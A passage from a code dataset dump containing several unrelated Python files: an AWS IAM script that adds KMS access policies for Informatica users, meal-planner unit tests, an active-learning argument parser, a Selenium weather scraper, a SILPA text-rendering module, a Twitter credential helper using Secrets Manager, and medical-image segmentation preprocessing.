profile = \"\"\n if org_flag == \"ct\":\n config[f\"{profile}{account_name}\"] = dict(\n sso_start_url = \"https://globeaws.awsapps.com/start\",\n sso_region = region,\n sso_account_id = account_id,\n sso_role_name = \"AWSAdministratorAccess\",\n region = region,\n ca_bundle = \"C:\\\\Program Files\\\\Amazon\\AWSCLIV2\\\\nskp_config\\\\netskope-cert-bundle.pem\",\n output = \"json\",\n )\n elif org_flag == \"leg\":\n config[f\"{profile}{account_name}\"] = dict(\n source_profile = \"master\",\n role_arn = f'arn:aws:iam::{account_id}:role/OrganizationAccountAccessRole',\n region = region,\n ca_bundle = \"C:\\\\Program Files\\\\Amazon\\AWSCLIV2\\\\nskp_config\\\\netskope-cert-bundle.pem\",\n output = \"json\",\n )\n with open(filepath, \"w\") as configfile:\n config.write(configfile)\n delimiter()\n print(f\"Added profile {profile}{account_name} to your aws config file\")\n\n\ndef test_token(session):\n client = session.client('sts')\n try:\n client.get_caller_identity()\n except (UnauthorizedSSOTokenError, SSOTokenLoadError) as e:\n if \"expired or is otherwise invalid\" in str(e):\n delimiter()\n logger.info(e)\n logger.info(\"Reinitiating SSO Login...\")\n os.system(f\"aws sso login --profile {session.profile_name}\")\n return \n\n\ndef client_config(creds,service,region='us-west-2'):\n response = session.client(\n aws_access_key_id = creds['AccessKeyId'],\n aws_secret_access_key = creds['SecretAccessKey'],\n aws_session_token = creds['SessionToken'],\n region_name = region,\n service_name = service\n )\n return response\n\n\ndef delimiter(symbol='='):\n logger.info(symbol * 120)\n\n\ndef get_resource(identifier:str):\n client = session.client('kms') \n if \"nil_\" in identifier:\n print(\"nil_ to nil-\")\n identifier = identifier.replace('nil_','nil-')\n elif \"nilpmfmast\" in identifier:\n print(\"nilpmfmast to nil-pmfmast\")\n identifier = identifier.replace('nilpmfmast','nil-pmfmast')\n print(identifier)\n try:\n return client.describe_key(\n KeyId=f\"alias/{identifier}\"\n )['KeyMetadata']\n except client.exceptions.NotFoundException:\n print(\"KMS Key not found using the provided alias,\"\n \" granting access to Key based on alias.\")\n return {'Arn':f\"arn:aws:kms:us-west-2:896172592430:alias/*{identifier[-7:]}\"}\n\ndef get_bucket_name(env:str):\n if env == \"dev\":\n return 'tmk-cdm-data'\n elif env in [\"test\",\"tst\"]:\n return 'tmk-cdm-test-data'\n elif env in [\"prod\",\"prd\"]:\n return 'tmk-cdm-prd-data'\n else:\n print(\"environment not detected\")\n return None\n\n\ndef attach_policy(user_name,policy):\n try:\n user_pol = iam.get_user_policy(\n UserName=user_name,\n PolicyName=f\"Informatica_CmnUtilKey_Access\"\n )\n result = True\n except iam.exceptions.NoSuchEntityException:\n result = False\n if result:\n print(f\"Policy already present on {user_name}\")\n else:\n print(f\"!!!Adding Policy to {user_name}!!!\")\n iam.put_user_policy(\n UserName=user_name,\n PolicyName=f\"Informatica_CmnUtilKey_Access\",\n PolicyDocument=policy\n )\n\n\ndef create_policy():\n return {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"KMSAccess\",\n \"Effect\": \"Allow\",\n \"Action\": [\n \"kms:Encrypt\",\n \"kms:Decrypt\",\n \"kms:ReEncrypt*\",\n \"kms:GenerateDataKey*\",\n \"kms:DescribeKey\"\n ],\n \"Resource\": get_resource(f\"CmnUtilKeyAlias\")['Arn']\n } \n ]\n }\n\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nuserprofile = os.environ[\"USERPROFILE\"]\naws = \"/.aws/\"\naws_config_file = f\"{userprofile}{aws}config\"\n\naccount_id_dict = {\n 'dev': '896172592430',\n 'tst': '856695471500',\n 'prd': '838001389413'\n}\nenvironment_id = input(\"Enter environment: \").upper()\ntarget_account_id = account_id_dict[environment_id.lower()]\ntarget_account_name = f\"cdm_{environment_id.lower()}\"\norg_flag = input(\"Is this in the CT or Legacy Org? (CT or Leg) \")\norg_flag = org_flag.lower()\nregion = \"us-west-2\"\nif awscliv2_exists:\n append_profiles(aws_config_file,target_account_id,target_account_name)\nsession = boto3.session.Session(\n profile_name=target_account_name,\n region_name=region\n)\nsts = session.client(\"sts\")\ntest_token(session)\niam = session.client('iam')\nsm = session.client('secretsmanager')\n\nusers = [user for user in iam.list_users()['Users'] if f\"Informatica_{environment_id}\" in user['UserName']]\npolicy = json.dumps(create_policy())\nprint(users)\nfor user in users:\n attach_policy(user['UserName'],policy)","repo_name":"SGWalls/Walls-AWS","sub_path":"aws_IAMTasks/add_policy_CDM_InformaticaUsers.py","file_name":"add_policy_CDM_InformaticaUsers.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1147663646","text":"from mealplanner.domain.direction_repository import DirectionRepository\nfrom mealplanner.domain.direction import Direction\nimport unittest\n\n\nclass TestDirectionRepository(unittest.TestCase):\n\n def setUp(self):\n self.test_repo = DirectionRepository('test.db')\n\n def tearDown(self):\n self.test_repo.drop_db()\n\n def test_save_direction__should_save_both_directions__when_two_provided(self):\n # Arrange\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 1))\n self.test_repo.save_direction(Direction(\"test_direction_2\", 1, 2))\n\n # Act\n actual = self.test_repo.retrieve_directions()\n\n # Assert\n self.assertEqual(2, len(actual))\n\n def test_save_direction__should_not_save_direction_again__when_it_already_exists(self):\n # Arrange\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 1))\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 2, 1))\n\n # Act\n actual = self.test_repo.retrieve_directions()\n\n # Assert\n self.assertEqual(1, len(actual))\n\n def test_save_direction__should_not_save_direction_again__when_it_already_exists_in_different_case(self):\n # Arrange\n self.test_repo.save_direction(Direction(\"test_direction_1\", 1, 1))\n self.test_repo.save_direction(Direction(\"TEST_DIRECTION_1\", 1, 1, 1))\n\n # Act\n actual = self.test_repo.retrieve_directions()\n\n # Assert\n self.assertEqual(1, len(actual))\n\n def test_save_direction__should_save_direction__when_none_exist(self):\n # Arrange\n name = \"test_direction_1\"\n self.test_repo.save_direction(Direction(name, 1, 1))\n\n # Act\n actual = self.test_repo.retrieve_directions()[0].direction\n\n # Assert\n self.assertEqual(name, actual)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"mnilson/meal_planner","sub_path":"tests/test_direction_repository.py","file_name":"test_direction_repository.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73912682173","text":"import argparse\nimport torch\nimport functools\n\n\ndef parse_al_args():\n parser = argparse.ArgumentParser(\"common parameters for active learning\")\n parser.add_argument(\"--MODEL_NAME\", default=\"facebook/contriever\")\n parser.add_argument(\"--DATA_NAME\", help=\"DATA_NAME is required. Try msmarco or nq\")\n parser.add_argument(\n \"--RESULTS_DIR\", help=\"RESULTS_DIR is required. e.g.: msmarco_new_human\"\n )\n parser.add_argument(\n \"--path_to_ranking_profile_bm25\",\n default=\"\",\n help=(\n \"path_to_ranking_profile_bm25 is required,\"\n \" which can be obtained by BM25 with k1=0.9 and b=0.4.\"\n ),\n )\n parser.add_argument(\"--STEP\", help=\"STEP is required, starting with 0\")\n parser.add_argument(\"--N_REPEATS\", default=3, type=int)\n parser.add_argument(\"--REPEAT_SEED\", default=42, type=int)\n parser.add_argument(\n \"--path_to_splits\",\n default=\"\",\n help=\"find qids_split by train_data.pt or train_data_human_response.pt\",\n )\n parser.add_argument(\"--number_of_qid_split_batch\", default=4, type=int)\n parser.add_argument(\"--NUM_EPOCHS\", default=10, type=int)\n parser.add_argument(\"--DRYRUN\", default=0, type=int)\n\n args = parser.parse_args()\n print(args)\n\n try:\n STEP = int(args.STEP)\n except ValueError:\n STEP = args.STEP\n\n qids_split = []\n if len(args.path_to_splits):\n for i in range(args.number_of_qid_split_batch):\n training_data = torch.load(\n f\"{args.path_to_splits}/data_iteration_{i}/training_data.pt\"\n )\n qids_split.append(\n list(\n set(training_data.keys())\n - set(functools.reduce(list.__add__, qids_split, []))\n )\n )\n qids_split = [[str(x) for x in s] for s in qids_split]\n\n if len(args.path_to_ranking_profile_bm25):\n ranking_profile_bm25 = torch.load(args.path_to_ranking_profile_bm25)\n else:\n ranking_profile_bm25 = None\n\n return (\n args.MODEL_NAME,\n args.DATA_NAME,\n args.RESULTS_DIR,\n STEP,\n ranking_profile_bm25,\n qids_split,\n args.N_REPEATS,\n args.REPEAT_SEED,\n args.number_of_qid_split_batch,\n args.NUM_EPOCHS,\n args.DRYRUN,\n )\n","repo_name":"awslabs/crowd-coachable-recommendations","sub_path":"scripts/al_commons.py","file_name":"al_commons.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"31241804614","text":"import schedule\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nstart_urls = [\n \"https://www.accuweather.com/es/ec/guayaquil/127947/weather-forecast/127947\",\n \"https://www.accuweather.com/es/ec/quito/129846/weather-forecast/129846\",\n \"https://www.accuweather.com/es/es/madrid/308526/weather-forecast/308526\"\n]\n\nopts = Options()\nopts.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\")\n\n\ndef extraer_datos():\n driver = webdriver.Chrome(\n service=Service(ChromeDriverManager().install()),\n options=opts\n )\n\n for url in start_urls:\n driver.get(url)\n\n ciudad = driver.find_element(By.XPATH, '//h1').text\n current = driver.find_element(By.XPATH, '//div[contains(@class, \"cur-con-weather-card__body\")]//div[@class=\"temp\"]').text\n real_feel = driver.find_element(By.XPATH, '//div[contains(@class, \"cur-con-weather-card__body\")]//div[@class=\"real-feel\"]').text\n\n ciudad = ciudad.replace('\\n', '').replace('\\r', '').strip()\n current = current.replace('C', '').replace('°', '').replace('\\n', '').replace('\\r', '').strip()\n real_feel = real_feel.replace('RealFeel®', '').replace('°', '').replace('\\n', '').replace('\\r', '').strip()\n\n f = open(\"./datos_clima_selenium.csv\", \"a\")\n f.write(ciudad + \",\" + current + \",\" + real_feel + \"\\n\")\n f.close()\n\n print(ciudad)\n print(current)\n print(real_feel)\n print()\n\n driver.close()\n\n\nschedule.every(5).seconds.do(extraer_datos)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n\n","repo_name":"jeffreymonjacastro/2023-II","sub_path":"Web Scraping/nivel6/4_utomatizacion_selenium.py","file_name":"4_utomatizacion_selenium.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"22526890630","text":"import sys\nimport re\nimport os\nfrom common import *\nfrom utils import *\nimport cairo\nimport hashlib\nimport urllib\nimport pango\nimport pangocairo\nfrom wiki2pdf import Wikiparser\nfrom modules.hyphenator import hyphenator\nfrom styles import *\nfrom common.silparesponse import SilpaResponse\n\nclass Render(SilpaModule):\n def __init__(self):\n self.template = os.path.join(os.path.dirname(__file__), \"render.html\")\n self.tmp_folder = os.path.join(os.path.dirname(__file__), \"tmp\")\n self.response = SilpaResponse(self.template)\n \n \n def set_request(self,request):\n self.request=request\n self.response.populate_form(self.request)\n self.file_type= self.request.get('type')\n self.wiki_url= self.request.get('wiki')\n self.text = self.request.get('text')\n self.font = self.request.get('font')\n self.font_size = self.request.get('font_size')\n self.color = self.request.get('color')\n self.file_type = self.request.get('file_type')\n \n def set_start_response(self,start_response):\n self.start_response = start_response\n \n def get_response(self):\n if self.text != None:\n if self.file_type==None:\n self.file_type = \"png\"\n if self.font==None:\n self.font = \"Serif\" \n if self.font_size==None:\n self.font_size = 12 \n if self.color==None:\n self.color = \"Black\" \n image_url = self.render_text(self.text, self.file_type, 0, 0 ,self.color, self.font, self.font_size)\n self.response.response_code = \"303 see other\" \n self.response.header = [('Location', image_url)]\n if self.wiki_url != None: \n pdf_url = self.wiki2pdf(self.wiki_url, self.font)\n self.response.response_code = \"303 see other\" \n self.response.header = [('Location', pdf_url)]\n return self.response\n \n @ServiceMethod \n def wiki2pdf(self, url, font='Serif'):\n m = hashlib.md5()\n m.update(url.encode(\"utf-8\"))\n filename = m.hexdigest()[0:5]+\".pdf\"\n #if not os.path.exists(os.path.join(os.path.dirname(__file__), \"tmp\",filename)):\n parser = Wikiparser(url,filename, font) \n parser.parse()\n #else:\n\t\t#\tprint (\"File already exists.\") \n return (\"modules/render/tmp/\"+filename)\n \n @ServiceMethod \n def render_text(self, text, file_type='png', width=0, height=0, color=\"Black\", font='Serif', font_size=12):\n surface = None\n width=int(width)\n height=int(height)\n font_size=int(font_size)\n text= text.decode(\"utf-8\")\n m = hashlib.md5()\n m.update(text.encode(\"utf-8\"))\n filename = m.hexdigest()[0:5]+\".\"+file_type\n outputfile = os.path.join(self.tmp_folder, filename )\n if file_type == 'png':\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, int(width), int(height))\n if file_type == 'svg':\n surface = cairo.SVGSurface(outputfile,int(width),int(height))\n if file_type == 'pdf':\n surface = cairo.PDFSurface(outputfile,int(width),int(height))\n context = cairo.Context(surface)\n try:\n text = hyphenator.getInstance().hyphenate(text,u'\\u00AD')\n except:\n print(\"error while hyphenating. Proceeding without Hyphenation\") \n width = int(width)\n left_margin = 10\n top_margin = 20\n bottom_margin = 50\n position_x = left_margin\n position_y = top_margin\n rgba = get_color(color)\n context.set_source_rgba (float(rgba.red),float(rgba.green),float(rgba.blue),float(rgba.alpha))\n pc = pangocairo.CairoContext(context)\n paragraph_layout = pc.create_layout()\n paragraph_font_description = pango.FontDescription()\n paragraph_font_description.set_family(font)\n paragraph_font_description.set_size((int)(int(font_size) * pango.SCALE))\n paragraph_layout.set_font_description(paragraph_font_description)\n if width>0:\n paragraph_layout.set_width((int)((width-2*left_margin) * pango.SCALE))\n paragraph_layout.set_justify(True)\n paragraph_layout.set_text(text+\"\\n\")\n context.move_to(position_x, position_y)\n pango_layout_iter = paragraph_layout.get_iter();\n\n line_width = 0\n while not pango_layout_iter.at_last_line():\n first_line = True\n context.move_to(position_x, position_y)\n while not pango_layout_iter.at_last_line() :\n ink_rect, logical_rect = pango_layout_iter.get_line_extents()\n line = pango_layout_iter.get_line_readonly()\n has_next_line=pango_layout_iter.next_line()\n # Decrease paragraph spacing\n if ink_rect[2] == 0 : #It is para break\n dy = font_size / 2\n position_y += dy\n if not first_line:\n self.context.rel_move_to(0, dy)\n else:\n xstart = 1.0 * logical_rect[0] / pango.SCALE\n context.rel_move_to(xstart, 0)\n if width >0 and height > 0 :\n pc.show_layout_line( line)\n line_height = (int)(logical_rect[3] / pango.SCALE)\n line_width = (int)(logical_rect[2] / pango.SCALE)\n context.rel_move_to(-xstart, line_height )\n position_y += line_height \n first_line = False\n if width==0 or height==0:\n if width==0:\n width = line_width\n if height==0: \n height = position_y\n return self.render_text(text,file_type, width + 2.5*left_margin, height,color,font, font_size)\n if file_type == 'png':\n surface.write_to_png(str(outputfile))\n else:\n context.show_page()\n return \"modules/render/tmp/\"+filename\n\n def get_module_name(self):\n return \"Script Renderer\"\n\n def get_info(self):\n return \"Provides rendered images for Complex scripts\" \n \ndef getInstance():\n return Render()\n\n\n","repo_name":"santhoshtr/silpa","sub_path":"src/silpa/modules/render/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":6255,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"16562205616","text":"from pcalib import dpca\nimport pandas as pd\n\nurl = \"https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data\"\ndf = pd.read_csv(url, names=['sepal length','sepal width','petal length','petal width','target'])\n\nfeatures = ['sepal length', 'sepal width', 'petal length', 'petal width']\nlabel = ['target']\n\nnewdf = dpca(df, features, label, 2, [\"pc1\",\"pc2\"])\nnewdf = newdf.apply()\n\nprint(newdf.head(5))\n","repo_name":"ivanachillee/pcalib","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72065974331","text":"import boto3\nimport tweepy\nimport base64\nimport ast\nfrom botocore.exceptions import ClientError\n\ndef get_credentials():\n secret_name = 'automated_david_credentials'\n region_name = 'us-east-1'\n\n # Create a Secrets Manager client\n session = boto3.session.Session()\n client = session.client(\n service_name='secretsmanager',\n region_name=region_name\n )\n\n # In this sample we only handle the specific exceptions for the 'GetSecretValue' API.\n # See https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html\n # We rethrow the exception by default.\n\n try:\n get_secret_value_response = client.get_secret_value(\n SecretId=secret_name\n )\n except ClientError as e:\n if e.response['Error']['Code'] == 'DecryptionFailureException':\n # Secrets Manager can't decrypt the protected secret text using the provided KMS key.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InternalServiceErrorException':\n # An error occurred on the server side.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n # You provided an invalid value for a parameter.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n # You provided a parameter value that is not valid for the current state of the resource.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n elif e.response['Error']['Code'] == 'ResourceNotFoundException':\n # We can't find the resource that you asked for.\n # Deal with the exception here, and/or rethrow at your discretion.\n raise e\n else:\n # Decrypts secret using the associated KMS CMK.\n # Depending on whether the secret is a string or binary, one of these fields will be populated.\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n return ast.literal_eval(secret)\n else:\n decoded_binary_secret = base64.b64decode(get_secret_value_response['SecretBinary'])\n return decoded_binary_secret\n\n# Access and authorize our Twitter credentials from credentials.py\ndef twitter_api_connect():\n creds = get_credentials()\n auth = tweepy.OAuthHandler(creds['CONSUMER_KEY'], creds['CONSUMER_SECRET'])\n auth.set_access_token(creds['ACCESS_TOKEN'], creds['ACCESS_TOKEN_SECRET'])\n api = tweepy.API(auth_handler=auth, wait_on_rate_limit=True)\n return api\n\ndef get_tweet_url(tweet):\n return 'https://twitter.com/' + tweet.user.screen_name + '/status/' + tweet.id_str","repo_name":"ddurks/automated_david","sub_path":"twitter_api.py","file_name":"twitter_api.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70694658812","text":"import sys\nimport os\nimport pydicom\nimport glob\nimport SimpleITK as sitk\nimport pandas as pd\nimport numpy as np\nfrom dcm_to_nrrd import dcm_to_nrrd\nfrom rtstruct_to_nrrd import rtstruct_to_nrrd\nfrom combine_structures import combine_structures\nfrom interpolate import interpolate\nfrom crop_image import crop_top, crop_top_image_only, crop_full_body\nfrom registration import nrrd_reg_rigid\nimport SimpleITK as sitk\nimport shutil\nimport nibabel as ni\n\n\ndef change_img_name(proj_dir):\n count = 0\n for root, subdirs, files in os.walk(proj_dir + '/raw_img'):\n for fn in files:\n count += 1\n #print(fn)\n old_path = os.path.join(root, fn)\n #fn = fn.replace('-', '_')\n new_fn = fn.split('_')[1] + '.nrrd'\n print(count, new_fn)\n new_path = os.path.join(root, new_fn)\n print(count, new_path)\n os.rename(old_path, new_path) \n\n\ndef get_seg_info(proj_dir):\n \"\"\"\n COMBINING MASKS \n \"\"\"\n dfci_img_dir = proj_dir + '/raw_img'\n dfci_seg_dir = proj_dir + '/uncombined_seg'\n output_dir = proj_dir + '/output_data' \n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n _pn_list = ['cm', 'mm', '+', '**', 'z', 'none', 'resident', 'pre', 'dfrm', 'Dfmd', 'dfmd','Dfrmd', \n 'CTV', 'Pre', 'Expansion', 'virtual', 'Virtual', 'LX', 'TEMP', 'expand', 'larynx', 'vGTV']\n _N_list = ['TONSIL', 'Prim', 'NPX', 'OPX', 'FINAL', 'Pre', 'Tonsil', 'New', 'Dfrmd', 'TNSL']\n _n_list = ['tonsil', 'TONSIL', 'expand', 'noFDG', 'resident', 'Central', 'central', 'Joint', 'PT', \n 'nodose', 'Tnsil', 'Tonsil', 'yinitialGTVp', 'Pre', 'larynx', 'Combined', 'p', 'new']\n n_list = ['L 2', 'R 3', 'L_lvl', 'R_lvl', 'parotid', 'L2', 'parap', 'LII', 'RII', 'R_2']\n p_list = ['BOT', 'P', 'p', 'pn', 'Tonsil', 'Primary', 'TONSIL', 'prim', 'primary', 'RTONSIL', 'PRIMARY', \n 'tonsil', 'Prim', 'phar', 'OPX', 'HPX', 'palate', 'larynx', 'Central', 'central', 'TNSL', 'tumor', '_p_70_n'] \n _p_list = ['NK', 'LN', 'parotid', 'parap', 'neck', 'Neck', 'RP', 'Node', 'RII', 'LII', 'R_2', 'GTVn']\n seg_IDsss = []\n for tumor_type in ['pn', 'n', 'p']:\n if tumor_type == 'pn':\n pat_IDs = []\n seg_IDss = [] \n for img_dir in sorted(glob.glob(dfci_img_dir + '/*nrrd')):\n seg_dirs = []\n seg_IDs = []\n pat_id = img_dir.split('/')[-1].split('.')[0]\n #print(pat_id)\n for folder in os.listdir(dfci_seg_dir):\n ID = folder.split('.')[0]\n if ID == pat_id:\n #print(ID)\n for seg_dir in glob.glob(os.path.join(dfci_seg_dir, folder) + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n if 'GTV' in seg_name and not any(x in seg_name for x in _pn_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n print(pat_id, seg_IDs)\n pat_IDs.append(pat_id)\n seg_IDss.append(seg_IDs)\n elif tumor_type == 'n':\n pat_IDs = []\n seg_IDss = []\n for img_dir in sorted(glob.glob(dfci_img_dir + '/*nrrd')):\n seg_dirs = []\n seg_IDs = []\n pat_id = img_dir.split('/')[-1].split('.')[0]\n #print(pat_id)\n for folder in os.listdir(dfci_seg_dir):\n ID = folder.split('.')[0]\n if ID == pat_id:\n #print(ID)\n for seg_dir in glob.glob(os.path.join(dfci_seg_dir, folder) + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n if 'GTV' in seg_name and not any(x in seg_name for x in _pn_list):\n if 'N' in seg_name and not any(x in seg_name for x in _N_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n elif 'n' in seg_name and not any(x in seg_name for x in _n_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n elif any(x in seg_name for x in n_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n print(pat_id, seg_IDs)\n pat_IDs.append(pat_id)\n seg_IDss.append(seg_IDs)\n elif tumor_type == 'p':\n pat_IDs = []\n seg_IDss = []\n for img_dir in sorted(glob.glob(dfci_img_dir + '/*nrrd')):\n seg_dirs = []\n seg_IDs = []\n pat_id = img_dir.split('/')[-1].split('.')[0]\n #print(pat_id)\n for folder in os.listdir(dfci_seg_dir):\n ID = folder.split('.')[0]\n if ID == pat_id:\n #print(ID)\n for seg_dir in glob.glob(os.path.join(dfci_seg_dir, folder) + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n if 'GTV' in seg_name and not any(x in seg_name for x in _pn_list):\n if any(x in seg_name for x in p_list) and not any(x in seg_name for x in _p_list):\n seg_dirs.append(seg_dir)\n seg_IDs.append(seg_name)\n print(pat_id, seg_IDs)\n pat_IDs.append(pat_id)\n seg_IDss.append(seg_IDs)\n seg_IDsss.append(seg_IDss)\n df = pd.DataFrame({'pat id': pat_IDs, 'pn': seg_IDsss[0], 'n': seg_IDsss[1], 'p': seg_IDsss[2]})\n fn = output_dir + '/GTV_seg.csv'\n df.to_csv(fn, index=True)\n\n\ndef combine_mask2(proj_dir, tumor_type):\n \"\"\"\n COMBINING MASKS \n \"\"\"\n raw_img_dir = proj_dir + '/raw_img'\n uncombined_seg_dir = proj_dir + '/uncombined_seg'\n seg_n_save_dir = proj_dir + '/raw_seg_n'\n seg_p_save_dir = proj_dir + '/raw_seg_p'\n seg_pn_save_dir = proj_dir + '/raw_seg_pn'\n if not os.path.exists(seg_n_save_dir):\n os.makedirs(seg_n_save_dir)\n if not os.path.exists(seg_p_save_dir):\n os.makedirs(seg_p_save_dir)\n if not os.path.exists(seg_pn_save_dir):\n os.makedirs(seg_pn_save_dir)\n if tumor_type == 'n':\n seg_save_dir = seg_n_save_dir\n if tumor_type == 'p':\n seg_save_dir = seg_p_save_dir\n if tumor_type == 'pn':\n seg_save_dir = seg_pn_save_dir\n \n df = pd.read_csv(proj_dir + '/output_data/GTV_seg.csv', converters={tumor_type: pd.eval})\n img_ids = []\n seg_namess = []\n bad_data = []\n count = 0\n for img_dir in sorted(glob.glob(raw_img_dir + '/*nrrd')):\n seg_names = []\n seg_dirs = []\n #img_id = img_dir.split('/')[-1].split('_')[1]\n img_id = img_dir.split('/')[-1].split('.')[0]\n #print(img_id)\n for seg_folder in os.listdir(uncombined_seg_dir):\n #print(seg_folder)\n #seg_id = seg_folder.split('_')[1]\n seg_id = str(seg_folder)\n #print(seg_id)\n if seg_id == img_id:\n count += 1\n print(count, 'ID:', seg_id)\n for df_id, gtv_list in zip(df['pat id'], df[tumor_type]):\n if df_id == seg_id:\n print(df_id)\n print(gtv_list)\n if gtv_list:\n for gtv in gtv_list:\n gtv_dir = uncombined_seg_dir + '/' + seg_folder + '/' + gtv + '.nrrd'\n #print(gtv_dir)\n seg_dirs.append(gtv_dir)\n else:\n print('empty GTV list!')\n try:\n combined_mask = combine_structures(\n patient_id=seg_id, \n mask_arr=seg_dirs, \n path_to_reference_image_nrrd=img_dir, \n binary=2, \n return_type='sitk_object', \n output_dir=seg_save_dir)\n print('combine successfully')\n except Exception as e:\n print(seg_id, e)\n bad_data.append(seg_id)\n print('bad data:', bad_data)\n\n\ndef combine_mask(proj_dir, tumor_type):\n \"\"\"\n COMBINING MASKS \n \"\"\"\n raw_img_dir = proj_dir + '/raw_img'\n uncombined_seg_dir = proj_dir + '/uncombined_seg'\n seg_n_save_dir = proj_dir + '/raw_seg_n'\n seg_p_save_dir = proj_dir + '/raw_seg_p'\n seg_pn_save_dir = proj_dir + '/raw_seg_pn'\n if not os.path.exists(seg_n_save_dir):\n os.makedirs(seg_n_save_dir)\n if not os.path.exists(seg_p_save_dir):\n os.makedirs(seg_p_save_dir)\n if not os.path.exists(seg_pn_save_dir):\n os.makedirs(seg_pn_save_dir)\n if tumor_type == 'n':\n seg_save_dir = seg_n_save_dir\n csv_save_dir = proj_dir + '/combined_seg_n.csv'\n if tumor_type == 'p':\n seg_save_dir = seg_p_save_dir\n csv_save_dir = proj_dir + '/combined_seg_p.csv'\n if tumor_type == 'pn':\n seg_save_dir = seg_pn_save_dir\n csv_save_dir = proj_dir + '/combined_seg_pn.csv'\n img_ids = []\n seg_namess = []\n count = 0\n for img_dir in sorted(glob.glob(raw_img_dir + '/*nrrd')):\n seg_names = []\n seg_dirs = []\n #img_id = img_dir.split('/')[-1].split('_')[1]\n img_id = img_dir.split('/')[-1].split('.')[0]\n #print(img_id)\n for seg_folder in os.listdir(uncombined_seg_dir):\n #print(seg_folder)\n #seg_id = seg_folder.split('_')[1]\n seg_id = str(seg_folder)\n #print(seg_id)\n if seg_id == img_id:\n count += 1\n print(count, 'ID:', seg_id)\n for seg_dir in glob.glob(uncombined_seg_dir + '/' + seg_folder + '/*nrrd'):\n seg_name = seg_dir.split('/')[-1].split('.')[0]\n #print(seg_dir)\n #print(seg_name)\n if tumor_type == 'pn':\n if 'GTV' in seg_name and 'cm' not in seg_name and 'mm' not in seg_name \\\n and '+' not in seg_name and '**' not in seg_name and 'z' not in seg_name \\\n and 'resident' not in seg_name and 'pre' not in seg_name and 'Dfmd' not in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n #print('seg names:', seg_names)\n #print(seg_dir)\n elif tumor_type == 'n':\n if 'GTV' in seg_name and 'cm' not in seg_name and 'mm' not in seg_name \\\n and '+' not in seg_name and '**' not in seg_name and 'z' not in seg_name \\\n and 'resident' not in seg_name and 'pre' not in seg_name and 'Dfmd' not in seg_name:\n if 'N' in seg_name and 'TONSIL' not in seg_name and 'Prim' not in seg_name \\\n and 'NPX' not in seg_name and 'Neck' not in seg_name and 'FINAL' not in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n elif 'n' in seg_name and 'tonsil' not in seg_name and 'Tonsil' not in seg_name \\\n and 'expand' not in seg_name and 'noFDG' not in seg_name and 'resident' \\\n not in seg_name and 'neck' not in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n elif tumor_type == 'p':\n if 'GTV' in seg_name and 'cm' not in seg_name and 'mm' not in seg_name \\\n and '+' not in seg_name and '**' not in seg_name and 'z' not in seg_name \\\n and 'resident' not in seg_name and 'pre' not in seg_name and 'Dfmd' not in seg_name:\n if 'BOT' in seg_name or 'P' in seg_name or 'Tonsil' in seg_name \\\n or 'Primary' in seg_name or 'TONSIL' in seg_name or 'prim' in seg_name \\\n or 'primary' in seg_name or 'RTONSIL' in seg_name or 'PRIMARY' in seg_name \\\n or 'tonsil' in seg_name or 'Prim' in seg_name or 'phar' in seg_name \\\n or 'OPX' in seg_name or 'HPX' in seg_name or 'palate' in seg_name \\\n or 'phar' in seg_name:\n seg_dirs.append(seg_dir)\n seg_names.append(seg_name)\n\n try:\n combined_mask = combine_structures(\n patient_id=seg_id, \n mask_arr=seg_dirs, \n 